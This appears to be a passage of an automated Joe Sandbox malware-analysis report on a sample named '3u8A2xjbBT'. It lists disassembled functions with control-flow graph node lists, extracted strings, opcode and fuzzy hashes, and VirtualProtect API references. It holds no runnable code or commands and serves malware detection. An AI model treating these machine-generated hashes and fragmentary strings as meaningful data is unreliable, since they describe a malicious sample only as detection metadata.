                                      • Opcode ID: ccd635c27da5bfecec654733a2a35acb01790900d43e1af7d6dadac9158ce9fd
                                      • Instruction ID: 46ce25697ed16c44ffb00e82edf827dbe06c7b1efdb9b4f3be7430e912a19a4f
                                      • Opcode Fuzzy Hash: ccd635c27da5bfecec654733a2a35acb01790900d43e1af7d6dadac9158ce9fd
                                      • Instruction Fuzzy Hash: FD4169386007019FE325AF71D454A2EBBE2FF99601B408A2DD4468B794DF79FC0A8B95
                                      Function 059AF270 Relevance: 4.0, Strings: 3, Instructions: 249COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 308 59af270-59af27a 309 59af27c-59af2af call 59a85c8 308->309 310 59af2b2-59af2ff 308->310 320 59af339-59af392 310->320 321 59af301-59af304 310->321 332 59af39a 320->332 333 59af394-59af398 320->333 323 59af30c-59af310 321->323 324 59af312-59af321 323->324 325 59af330-59af336 323->325 324->325 328 59af323-59af32e 324->328 328->325 334 59af39c-59af3ce 332->334 333->334 337 59af400-59af55b call 59aaa58 call 59a86a8 call 59aab28 334->337 338 59af3d0-59af3fa 334->338 338->337 345 59af55e-59af567 338->345
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713696648.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_59a0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (q$(q$4'q
                                      • API String ID: 0-1557261691
                                      • Opcode ID: 42e1225ddff45ca861426bd588fcdba9b244e45822ce95f2a3d10344064c8867
                                      • Instruction ID: 5596425d0e90e7727790bf6ea2a1c9754f3c777c7d7dab93d865670564a32049
                                      • Opcode Fuzzy Hash: 42e1225ddff45ca861426bd588fcdba9b244e45822ce95f2a3d10344064c8867
                                      • Instruction Fuzzy Hash: AE81B175B002159FDB14DF79D850AAEBBF6FFC8200B148529D509E7354EE34AD068BA1
                                      Function 0A4982C0 Relevance: 3.9, Strings: 2, Instructions: 1397COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 373 a4982c0-a4982ec 375 a49835d-a498361 373->375 376 a4982ee-a49830d call a497e90 373->376 380 a49832f-a49833b 376->380 381 a49830f 376->381 382 a49833d-a49834d 380->382 383 a49834f-a498353 380->383 384 a498314-a49831c 381->384 382->383 383->375 385 a49831e-a498324 call a499e50 384->385 386 a498362-a499dd3 384->386 388 a49832a-a49832d 385->388 388->380 388->384
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: VkK$VkK
                                      • API String ID: 0-3769241841
                                      • Opcode ID: ea57d0e56d2554c295e8d2b3da93e7a7243c832197ab657f116cbfe65d9065b3
                                      • Instruction ID: 3ba023ec6d861892f9759d18401bf3743438c914f414edf8af1d7a84d4e7010c
                                      • Opcode Fuzzy Hash: ea57d0e56d2554c295e8d2b3da93e7a7243c832197ab657f116cbfe65d9065b3
                                      • Instruction Fuzzy Hash: 65E23978A002199FEB249F50DC54BAE7B72FF98301F1040E9D90A6B795CB392D82DF95
                                      Function 059AAE20 Relevance: 3.9, Strings: 3, Instructions: 108COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 755 59aae20-59aae41 757 59aae6d-59aae7c 755->757 758 59aae43-59aae6c 755->758 761 59aaeaa-59aaeb7 757->761 762 59aae7e-59aaea9 757->762 766 59aaf2b-59aaf2e 761->766 767 59aaeb9-59aaed5 761->767 771 59aaf36-59aaf65 766->771 775 59aaee8-59aaeed 767->775 776 59aaed7-59aaee6 767->776 777 59aaefc-59aaf2a 775->777 776->775 781 59aaeef-59aaefa 776->781 781->777
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713696648.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_59a0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$@bq$@bq
                                      • API String ID: 0-1752279952
                                      • Opcode ID: d9fdcc481cd507ce8f1ad605a04b02a4e2a2d0eb85e1b89af2b9e8c72418948e
                                      • Instruction ID: 8f9d5997d1bc27b8a837493458b81ce92ebad34aa843e5e8fa4019cad3a00b61
                                      • Opcode Fuzzy Hash: d9fdcc481cd507ce8f1ad605a04b02a4e2a2d0eb85e1b89af2b9e8c72418948e
                                      • Instruction Fuzzy Hash: 90419576E002059FC714EFA5D4409ACB7B2FFCC211B5545AAD919E7320DB70AE45CBE1
                                      Function 059A48A8 Relevance: 1.8, Strings: 1, Instructions: 504COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1263 59a48a8-59a4900 call 59a4650 1268 59a4902-59a4904 1263->1268 1269 59a4906-59a490a 1263->1269 1270 59a4910-59a4933 1268->1270 1269->1270 1275 59a493f-59a494b 1270->1275 1276 59a4935-59a493a 1270->1276 1281 59a497e-59a498a 1275->1281 1282 59a494d-59a4979 call 59a3f50 1275->1282 1277 59a4a1b-59a4a21 1276->1277 1278 59a4a23 1277->1278 1279 59a4a27-59a4a47 1277->1279 1278->1279 1294 59a4a49-59a4a4e 1279->1294 1295 59a4a53-59a4a68 1279->1295 1286 59a498c-59a4991 1281->1286 1287 59a4996-59a49aa 1281->1287 1282->1277 1286->1277 1299 59a49ac-59a49ce 1287->1299 1300 59a4a16 1287->1300 1297 59a4af0-59a4afe 1294->1297 1307 59a4aeb 1295->1307 1308 59a4a6e-59a4a7e 1295->1308 1303 59a4b00-59a4b04 1297->1303 1304 59a4b16-59a4b22 1297->1304 1319 59a49d0-59a49f2 1299->1319 1320 59a49f4-59a4a0d 1299->1320 1300->1277 1310 59a4b0c-59a4b0e 1303->1310 1313 59a4b28-59a4b44 1304->1313 1314 59a4c06-59a4c3a 1304->1314 1307->1297 1316 59a4a92-59a4a97 1308->1316 1317 59a4a80-59a4a90 1308->1317 1310->1304 1328 59a4bf2-59a4c00 1313->1328 1338 59a4c3c-59a4c50 1314->1338 1339 59a4c52-59a4c54 1314->1339 1316->1297 1317->1316 1325 59a4a99-59a4aa9 1317->1325 1319->1300 1319->1320 1320->1300 1340 59a4a0f-59a4a14 1320->1340 1336 59a4aab-59a4ab0 1325->1336 1337 59a4ab2-59a4ac2 1325->1337 1328->1314 1329 59a4b49-59a4b52 1328->1329 1334 59a4b58-59a4b6b 1329->1334 1335 59a4e11-59a4e38 1329->1335 1334->1335 1343 59a4b71-59a4b83 1334->1343 1348 59a4e3e-59a4e40 1335->1348 1349 59a4ecc-59a4f09 1335->1349 1336->1297 1353 59a4acb-59a4adb 1337->1353 1354 59a4ac4-59a4ac9 1337->1354 1338->1339 1341 59a4c56-59a4c5e 1339->1341 1342 59a4c84-59a4cc4 1339->1342 1340->1277 1350 59a4c66-59a4c68 1341->1350 1431 59a4cc6 call 59a5508 1342->1431 1432 59a4cc6 call 59a54f8 1342->1432 1358 59a4bef 1343->1358 1359 59a4b85-59a4b91 1343->1359 1348->1349 1356 59a4e46-59a4e48 1348->1356 1390 59a4f0b-59a4f0d 1349->1390 1391 59a4f56-59a4f94 1349->1391 1350->1342 1357 59a4c6a-59a4c7c 1350->1357 1365 59a4add-59a4ae2 1353->1365 1366 59a4ae4-59a4ae9 1353->1366 1354->1297 1356->1349 1361 59a4e4e-59a4e52 1356->1361 1357->1342 1358->1328 1359->1335 1363 59a4b97-59a4bec 1359->1363 1361->1349 1367 59a4e54-59a4e58 1361->1367 1363->1358 1365->1297 1366->1297 1370 59a4e6a-59a4eac 1367->1370 1371 59a4e5a-59a4e68 1367->1371 1369 59a4ccc-59a4ce0 1385 59a4ce2-59a4cf9 1369->1385 1386 59a4d27-59a4d74 1369->1386 1379 59a4eb4-59a4ec9 1370->1379 1371->1379 1403 59a4cfb-59a4d05 1385->1403 1404 59a4d07-59a4d1f call 59a3f50 1385->1404 1418 59a4dc8-59a4ddf 1386->1418 1419 59a4d76-59a4d8f 1386->1419 1395 59a4f0f-59a4f1d 1390->1395 1396 59a4f53-59a4f55 1390->1396 1399 59a4f1f-59a4f2c 1395->1399 1400 59a4f2d-59a4f37 1395->1400 1396->1391 1410 59a4f39-59a4f44 1400->1410 1411 59a4f46-59a4f4c 1400->1411 1403->1404 1404->1386 1421 59a4f4e 1410->1421 1411->1421 1426 59a4de1-59a4dfc 1418->1426 1427 59a4e05-59a4e0e 1418->1427 1424 59a4d99-59a4dc5 1419->1424 1425 59a4d91 1419->1425 1421->1396 1424->1418 1425->1424 1426->1427 1431->1369 1432->1369
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713696648.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_59a0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: C.h^
                                      • API String ID: 0-3035367375
                                      • Opcode ID: 1ca8d786339d81e3e87f034f27453628e5851f6b29a5e5a24ff7e62769b81fc1
                                      • Instruction ID: ca25502ed18e71589e322d5cee5076a4eeba25549de0c4eee0477ce7a07b7191
                                      • Opcode Fuzzy Hash: 1ca8d786339d81e3e87f034f27453628e5851f6b29a5e5a24ff7e62769b81fc1
                                      • Instruction Fuzzy Hash: 5C123A397006018FDB14DF39C484A6ABBF6FF89301B1584A9E50ADB366DB74EC45CBA0
                                      Function 059A3F50 Relevance: 1.7, Strings: 1, Instructions: 402COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713696648.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_59a0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $q
                                      • API String ID: 0-1301096350
                                      • Opcode ID: c8feb8618a3e878da4309fd687d9f2b95c9ff8efc76ac1df6bf9c7c910ac1def
                                      • Instruction ID: 07c4a0997bf19eab934467e1d52b4242d39bfbfcbbf1ee4d6b3186a25ece6e20
                                      • Opcode Fuzzy Hash: c8feb8618a3e878da4309fd687d9f2b95c9ff8efc76ac1df6bf9c7c910ac1def
                                      • Instruction Fuzzy Hash: 20F15335B002158FDB14DF69D584AAEBBF6FF88700B148569D906EB365DB70DC02CBA0
                                      Function 0A493D3C Relevance: 1.7, Strings: 1, Instructions: 401COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Kx=
                                      • API String ID: 0-3746052633
                                      • Opcode ID: 31d11f1551bf397c6412d1658d195e920d6b9ee94bb436138acb5655001c90a1
                                      • Instruction ID: 79aec64e31659262bd134a1f708bd0d56c01805ead929fc7f09ccb5f188a32bd
                                      • Opcode Fuzzy Hash: 31d11f1551bf397c6412d1658d195e920d6b9ee94bb436138acb5655001c90a1
                                      • Instruction Fuzzy Hash: 9F02F574D00228CFDF64CFA8C885BDEBBB1BF49340F1085AAD419A7250EB749A96CF55
                                      Function 0182AFD8 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 0182B086
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3710716391.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_1820000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 38dd6f9d6eface9bf724900c7679154018077ed27019735ef322e10fbf49a7a6
                                      • Instruction ID: 7be44a0237ef4554ce60cf279168360d66d3cbe25b10445b50975579c03499d9
                                      • Opcode Fuzzy Hash: 38dd6f9d6eface9bf724900c7679154018077ed27019735ef322e10fbf49a7a6
                                      • Instruction Fuzzy Hash: 6C3199B9D002589FCB10CFA9D984ADEFBB4BB09310F10902AE814B7210D375AA46CF64
                                      Function 0182AFE0 Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 0182B086
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3710716391.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_1820000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 2487a5d98dc4d380e34b1206fcc09a5eb3d232e6a90949465664829ec48a4ab1
                                      • Instruction ID: ec859634da75e3cdd3b0a95fd08339a6364ae198ac2be792f0a693c98d5fa41a
                                      • Opcode Fuzzy Hash: 2487a5d98dc4d380e34b1206fcc09a5eb3d232e6a90949465664829ec48a4ab1
                                      • Instruction Fuzzy Hash: B43188B9D012589FCB10CFAAD984ADEFBF5BB09310F10902AE814B7350D775AA46CF64
                                      Function 059AB980 Relevance: 1.6, Strings: 1, Instructions: 315COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713696648.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_59a0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Pqq
                                      • API String ID: 0-1334384951
                                      • Opcode ID: 710120bbfab19c65f969da10eb5c94274ce9292d7985766f94a39c13a1bc0ac5
                                      • Instruction ID: 3f4f68049deb749af2e7b626eb2191b53dae07c971f252b21dddae6bfa068178
                                      • Opcode Fuzzy Hash: 710120bbfab19c65f969da10eb5c94274ce9292d7985766f94a39c13a1bc0ac5
                                      • Instruction Fuzzy Hash: 04C1E975B102088FCB48DF69D598AADBBF2FB8C711B248429D90ADB355DF349D02CB85
                                      Function 0A49BC2F Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,q
                                      • API String ID: 0-196045463
                                      • Opcode ID: 7a347d96028ca6c0091777cf9042295210e2f420cd86a8250a32350895aa6077
                                      • Instruction ID: 4472e79890308e0e677e300bf0a64aeffc45eeb9d485373603fa92d8fce8e739
                                      • Opcode Fuzzy Hash: 7a347d96028ca6c0091777cf9042295210e2f420cd86a8250a32350895aa6077
                                      • Instruction Fuzzy Hash: 0191C938B04309DF9F745B75641463B6ED3EFCA28172540ABD92ACB355DE20CC138B66
                                      Function 059ADC08 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713696648.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_59a0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: pq
                                      • API String ID: 0-153521182
                                      • Opcode ID: b29ff96e8a933518814bb443446f4c2ac13c3beb92b7776ff1b8b9d54f11e5fb
                                      • Instruction ID: a8dc8f75596ef2cb3d391ad6258c8502133591042e0aaa2330efab75c7663cd1
                                      • Opcode Fuzzy Hash: b29ff96e8a933518814bb443446f4c2ac13c3beb92b7776ff1b8b9d54f11e5fb
                                      • Instruction Fuzzy Hash: 0281A376600110AFDB0A9FA8D944E157FB6FF4C31571A84E8F60A9F272C636DC61EB90
                                      Function 0A49C3F0 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: d
                                      • API String ID: 0-2564639436
                                      • Opcode ID: 7b8dc149b3b401a6f9ce376c3e3c5a087e1f821a7421f7c46591d64c27645810
                                      • Instruction ID: 31f80bb2d73a71f5b634d4608b454c1fdcef64f2b1b2363a0f83088c3392c4cd
                                      • Opcode Fuzzy Hash: 7b8dc149b3b401a6f9ce376c3e3c5a087e1f821a7421f7c46591d64c27645810
                                      • Instruction Fuzzy Hash: 51715C38A00A069FCF15CF59C5C08AAFBF6FF88310755C66AC95597615DB30F861CB90
                                      Function 059AE6D0 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713696648.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_59a0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Hq
                                      • API String ID: 0-1594803414
                                      • Opcode ID: 694847c7972c1818568ec05374c34a8fd6ca917a66a9977db3d0ea72a3f835d9
                                      • Instruction ID: 2cddb1893aedec9c7990960da2cb62049b7ed64efe45fa43f16b88e6dd9b7918
                                      • Opcode Fuzzy Hash: 694847c7972c1818568ec05374c34a8fd6ca917a66a9977db3d0ea72a3f835d9
                                      • Instruction Fuzzy Hash: B5519E36610110AFDB4A8F99D908D54BFB7FF4D32470A84E8E2199F272C736D861EB54
                                      Function 0A49A030 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: rjK
                                      • API String ID: 0-1449821741
                                      • Opcode ID: dd67c8ef2223a12ee942358e2b183b50b96adffe4deb6bd3bd302e8eadc59a65
                                      • Instruction ID: 0ab54b9825ccff583fe7b2d967d111ce33115ca611dfff4a8dcb61ef519c9810
                                      • Opcode Fuzzy Hash: dd67c8ef2223a12ee942358e2b183b50b96adffe4deb6bd3bd302e8eadc59a65
                                      • Instruction Fuzzy Hash: D4519038A002058FDB10DF58C880AAEBFB6FF84250F18C969D4199B355D775FD4B8BA5
                                      Function 0A499E50 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: |zD
                                      • API String ID: 0-755715745
                                      • Opcode ID: 80e071424720b50b96f01b71829510e3b4c91f036fb3c02ef6b8c1e8d5369f65
                                      • Instruction ID: e62723cb21de66abf4ae0b157e1541629193ad29cdef2892a799b6fc9f95b881
                                      • Opcode Fuzzy Hash: 80e071424720b50b96f01b71829510e3b4c91f036fb3c02ef6b8c1e8d5369f65
                                      • Instruction Fuzzy Hash: F441DF35B002509FCB24CF69988459EBFF1AF8935070986AED858DB366DB30EC028B90
                                      Function 0A49CC60 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: `6D
                                      • API String ID: 0-1313133090
                                      • Opcode ID: e5d3f25d4ac96db9f0a17af13195a2b14475ba4ceccc375867e6aee8b1d832aa
                                      • Instruction ID: a876d689c541386e0921761d2a6a757ddeaf710fc0ae0c2d75938d9ffc718f43
                                      • Opcode Fuzzy Hash: e5d3f25d4ac96db9f0a17af13195a2b14475ba4ceccc375867e6aee8b1d832aa
                                      • Instruction Fuzzy Hash: B741F0397047108FDB25CB29D88095BBFE5EFC536071A85AFD8599B356CA31EC11CB80
                                      Function 059AA0A0 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713696648.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_59a0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (q
                                      • API String ID: 0-2414175341
                                      • Opcode ID: b8f9c73a8a4eb69648c73bded443afba8db48899e62f7685d025aeac29146342
                                      • Instruction ID: 9b1c608cc6c348c18e1fe8e364486647fe598ef3a14cd896a0c60e3cbac69555
                                      • Opcode Fuzzy Hash: b8f9c73a8a4eb69648c73bded443afba8db48899e62f7685d025aeac29146342
                                      • Instruction Fuzzy Hash: B6212332B042069FCB05DF74D854AAEBFB6FF89210B14846AE909D7241DB35EC06CBA1
                                      Function 0A49CBE8 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: |zD
                                      • API String ID: 0-755715745
                                      • Opcode ID: 419e570155f7ebd2c8e1b3a28a28e4fbaf6bbb7ee7466b7b0e4de731c92b52bf
                                      • Instruction ID: 4893379d7027302db44e7c618410cbc56d7224e8e699fcc0664b583e33d50fe8
                                      • Opcode Fuzzy Hash: 419e570155f7ebd2c8e1b3a28a28e4fbaf6bbb7ee7466b7b0e4de731c92b52bf
                                      • Instruction Fuzzy Hash: 3221F339700A108FCB299B79949481B7FE6EFC975031584BED95ACB315CE35EC02CB80
                                      Function 0A495C4D Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: NK&>
                                      • API String ID: 0-620694716
                                      • Opcode ID: 43347e91618205cc553b04c917ed86193a8c578d58a15bf1c5036d67370de35f
                                      • Instruction ID: 216c0561bf6a8477e49781e59ba22ba7052b52de9e2ae45744be9e2144706801
                                      • Opcode Fuzzy Hash: 43347e91618205cc553b04c917ed86193a8c578d58a15bf1c5036d67370de35f
                                      • Instruction Fuzzy Hash: 6D31E278D01229CFDB25DFA5C844ADDBBB2FF88300F2081AAD819A7325DB305A81DF41
                                      Function 059A6E71 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713696648.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_59a0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: dSD
                                      • API String ID: 0-2402962622
                                      • Opcode ID: 768b1341676ea78447e8b9b36dfc5f6e5202b9b48758db07b0e6bda39461d434
                                      • Instruction ID: ab03a30807497976587a43fea4cc29eec9dfe642b3bd4b0c9820c5622f08080d
                                      • Opcode Fuzzy Hash: 768b1341676ea78447e8b9b36dfc5f6e5202b9b48758db07b0e6bda39461d434
                                      • Instruction Fuzzy Hash: 7E01E92620C2E82ECB564BBA1C608FB3FF89D9F21171901D6F9D4DA163C4298915D771
                                      Function 0A49A1B0 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: >D
                                      • API String ID: 0-3678657447
                                      • Opcode ID: 6fd72edf0ac5f8953cb8eb51f2d91be328d264299e3304e6ef0535f71d1100e5
                                      • Instruction ID: 45f4a0f7eacc2cac0392fbacb8005e7c2613be84388cb3bdfefa4462410706ac
                                      • Opcode Fuzzy Hash: 6fd72edf0ac5f8953cb8eb51f2d91be328d264299e3304e6ef0535f71d1100e5
                                      • Instruction Fuzzy Hash: 6911BE386017015FD725DF34D84089ABBB2FFC5615324CA6EC05A8F655CB75BC0B8780
                                      Function 059A3EBA Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713696648.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_59a0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: 4047337783dc22ef3f17750b61fb861a91bbd3192d11819315899f09a634be4f
                                      • Instruction ID: e8aa15b79b010238a6f9d15dbc3ccfe1f00a23e5ac3bf562569942f645f8f906
                                      • Opcode Fuzzy Hash: 4047337783dc22ef3f17750b61fb861a91bbd3192d11819315899f09a634be4f
                                      • Instruction Fuzzy Hash: C701D6347002411FC7299B75A4944AE7BF69FCA201354499DC486DB361DE24AC4B83A1
                                      Function 059A3EC8 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713696648.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_59a0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: b4f3cc6ce8b542a5a6219eae0779bf0b362e019fed3b3fd75bf659d44a35113d
                                      • Instruction ID: 5f89494b9708da9ecdbb767770c8051af04345868e6c74ea366fde32844cb8e7
                                      • Opcode Fuzzy Hash: b4f3cc6ce8b542a5a6219eae0779bf0b362e019fed3b3fd75bf659d44a35113d
                                      • Instruction Fuzzy Hash: 75F0F0343002010FC228EB6AE45496E77EAAFC8601350482CC50ADB314EF34FD4B83E2
                                      Function 059A6EA0 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3713696648.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_59a0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: dSD
                                      • API String ID: 0-2402962622
                                      • Opcode ID: 22b768f91f049e982ba4f7e2c8238e2dfed49a143fbb75eefdb02c3712a01fa4
                                      • Instruction ID: 0e9419b929140fd06b89aa9b73ccf1c59b8b49f4b8d6097334609702cd3e814d
                                      • Opcode Fuzzy Hash: 22b768f91f049e982ba4f7e2c8238e2dfed49a143fbb75eefdb02c3712a01fa4
                                      • Instruction Fuzzy Hash: 7FF037762041E93F8F555E9B5C10CFB7FEDEA8E561708405AFEA8D2141C42DCD209BB0
                                      Function 0A495505 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.3715200213.000000000A490000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_a490000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -#^L
                                      • API String ID: 0-306523431
